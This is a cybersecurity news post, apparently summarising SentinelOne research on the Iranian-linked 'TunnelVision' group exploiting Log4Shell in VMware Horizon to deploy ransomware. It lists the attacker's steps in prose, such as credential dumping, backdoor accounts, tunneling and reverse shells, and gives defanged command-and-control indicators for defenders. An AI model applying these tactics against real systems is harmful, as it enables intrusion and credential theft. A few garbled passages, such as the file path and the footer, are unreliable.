Iranian Hackers Use Vulnerability In VMware Horizon Log4j To Spread Ransomware.

According to SentinelOne researchers Amitai Ben Shushan Ehrlich and Yair Rigevsky, “TunnelVision actions are characterised by widespread exploitation of 1-day vulnerabilities in target regions , with intrusions spotted in the Middle East and the United States.”

TunnelVision’s activities in target regions are characterised by widespread exploitation of one-day vulnerabilities. We’ve seen widespread exploitation of Fortinet FortiOS (CVE-2018-13379), Microsoft Exchange (ProxyShell), and most recently Log4Shell during the time we’ve been watching this actor.  Fast Reverse Proxy Client (FRPC) and Plink are the most widely used tunnelling tools by the organisation.

  • SentinelLabs has been monitoring the activities of a threat actor with Iranian ties operating in the Middle East and the United States.
  • We’ve called this cluster of activity TunnelVision because of the threat actor’s extensive dependence on tunnelling tools and the unique way it chooses to widely deploy them.
  • TunnelVision’s operations were linked to the distribution of ransomware, making the group a potentially damaging actor, similar to other Iranian threat actors active in the region recently.

The most of the “online” activity  were carried out through this PowerShell backdoor. It appears to be a modified version of a public PowerShell one-liner.

Among those activities were:

  • Execution of recon commands.
  • Creation of a backdoor user and adding it to the administrators group.
  • Credential harvesting using Procdump, SAM hive dumps and comsvcs MiniDump.
  • Download and execution of tunneling tools, including Plink and Ngrok, used to tunnel RDP traffic.
  • Execution of a reverse shell utilizing VMware Horizon NodeJS component[1,2].
  • Internal subnet RDP scan using a publicly available port scan script.

Throughout the activity, the threat actor used the name “protections20” on a github repository called “VmWareHorizon” that belonged to an account owned by the threat actor.

A malicious process created from the VMware ViewServerbinws TomcatService.exe (C:Program FilesVMwareVMware ViewServerbinws TomcatService.exe) is used to exploit Log4j in VMware Horizon.

Finally the researchers concluded that ,” The cybersecurity firm linked the attacks to a different Iranian cluster, not because they’re unrelated, there is currently insufficient data to classify them as identical to any of the aforementioned attributions.”

Indicators of Compromise

Domainwww[.]microsoft-updateserver[.]cfCommand and Control (C2) Server
Domainwww[.]service-management[.]tkPayload server
IP51.89.169[.]198Command and Control (C2) Server
IP142.44.251[.]77Command and Control (C2) Server
IP51.89.135[.]142Command and Control (C2) Server
IP51.89.190[.]128Command and Control (C2) Server
IP51.89.178[.]210Command and Control (C2) Server, Tunneling Server
IP142.44.135[.]86Tunneling Server
IP182.54.217[.]2Payload Server
Github Account

–-For more Cyber security news in crisp content . Please follow our site via twitter handle @cyberworkx1, Linkedin handle @linkedin utilized to host payloads

Leave a Reply

Please log in using one of these methods to post your comment: Logo

You are commenting using your account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s